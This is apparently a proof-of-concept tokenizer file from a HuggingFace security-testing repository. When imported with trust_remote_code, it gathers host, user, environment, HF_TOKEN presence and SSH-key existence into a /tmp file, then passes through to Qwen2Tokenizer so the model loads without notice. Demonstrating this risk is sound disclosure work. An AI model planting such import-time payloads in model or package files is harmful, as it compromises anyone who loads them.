security-testing / custom_tokenizer.py
KevTheHermit's picture
Upload folder using huggingface_hub
523f9ca verified
"""
Proof-of-Concept: Arbitrary code execution via trust_remote_code=True
This file executes at import time when HuggingFace transformers loads
a custom tokenizer class. The payload runs BEFORE the class is even
instantiated.
For this security test we write a proof file to /tmp.
A real attacker would use a reverse shell, credential stealer, etc.
"""
# --- PAYLOAD RUNS AT IMPORT TIME (module level) ---
import datetime
import getpass
import os
import socket
# Security-test report: everything below executes as a side effect of importing
# this module. It records basic facts about the importing process and writes
# them to a fixed file under /tmp, then announces the path on stdout.
#
# Each entry is (label, value); entries are evaluated top to bottom and are
# rendered one per line as "<label> : <value>".
_report_fields = (
    ("Timestamp", datetime.datetime.now().isoformat()),
    ("Hostname", socket.gethostname()),
    ("User", getpass.getuser()),
    ("PID", os.getpid()),
    ("CWD", os.getcwd()),
    ("UID", os.getuid()),
    ("HOME", os.environ.get("HOME", "unknown")),
    # Only the presence of the token is recorded, never its value.
    ("HF_TOKEN", "PRESENT" if os.environ.get("HF_TOKEN") else "not set"),
    # Boolean: whether a default RSA private key file exists for this user.
    ("SSH keys", os.path.exists(os.path.expanduser("~/.ssh/id_rsa"))),
)

# Banner line, one line per field, closing rule, and a trailing newline.
_proof = "\n".join(
    [
        "========== EXO RCE PROOF ==========",
        *(f"{label} : {value}" for label, value in _report_fields),
        "=======================================",
    ]
) + "\n"

_proof_path = "/tmp/exo-rce-proof.txt"

# Mode "w" truncates any existing report, so only the latest import is kept.
with open(_proof_path, "w") as f:
    f.write(_proof)

print(f"\n[!] RCE PROOF WRITTEN TO {_proof_path}\n")
# --- END PAYLOAD ---
# Subclass the REAL Qwen2Tokenizer so the model still works after payload fires.
# This is key — the attacker wants the model to load successfully so the
# compromise isn't noticed.
from transformers import Qwen2Tokenizer
class PoisonedQwen2Tokenizer(Qwen2Tokenizer):
    """Pass-through subclass of ``Qwen2Tokenizer`` used by this security test.

    The class overrides nothing and adds no attributes, so all tokenizer
    behaviour is inherited unchanged from ``Qwen2Tokenizer``. The side
    effects demonstrated by this file come from the module-level statements
    that run when the module is imported, not from this class.
    """